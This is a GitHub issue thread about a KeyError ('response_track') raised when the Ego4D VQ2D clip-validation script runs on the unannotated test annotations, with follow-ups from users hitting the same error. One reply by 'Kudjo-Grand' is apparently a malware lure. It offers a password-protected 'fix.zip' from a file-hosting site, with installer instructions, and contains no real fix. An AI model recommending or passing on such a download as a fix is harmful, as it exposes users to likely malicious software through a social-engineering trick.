### ISSUE TITLE
Validate the extracted clips has a small mistake

### ISSUE THREAD

**Issue by fb-reps** [EGO4D/episodic-memory#55]
Hello,
As VQ2D/readme.md description:
<pre> bash
# Validate the extracted clips (should take 30 minutes)
python tools/validate_extracted_clips.py \
    --annot-paths data/vq_val.json data/vq_test_unannotated.json \
    --clips-root data/clips
</pre>
but when I run:
<pre> bash
python tools/validate_extracted_clips.py \
    --annot-paths  data/vq_test_unannotated.json \
    --clips-root data/clips
</pre>
There will be a error:
<pre> bash
Traceback (most recent call last):
  File "tools/validate_extracted_clips.py", line 95, in <module>
    main(args)
  File "tools/validate_extracted_clips.py", line 84, in main
    check_clip(c_uid, clips2annotations[c_uid], clip2metadata[c_uid], args)
  File "tools/validate_extracted_clips.py", line 41, in check_clip
    rt_fnos = [rf["frame_number"] for rf in qset["response_track"]]
KeyError: 'response_track'
</pre>
by the way, when I use path 'data/vq_val.json', it work.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ga1i13o** [comment]
I have the same issue. Any fixes?

**Comment by cyfedu-dlut** [comment]
Hi, bro, have you solved this issue? i also meet this problem. We can discuss it.
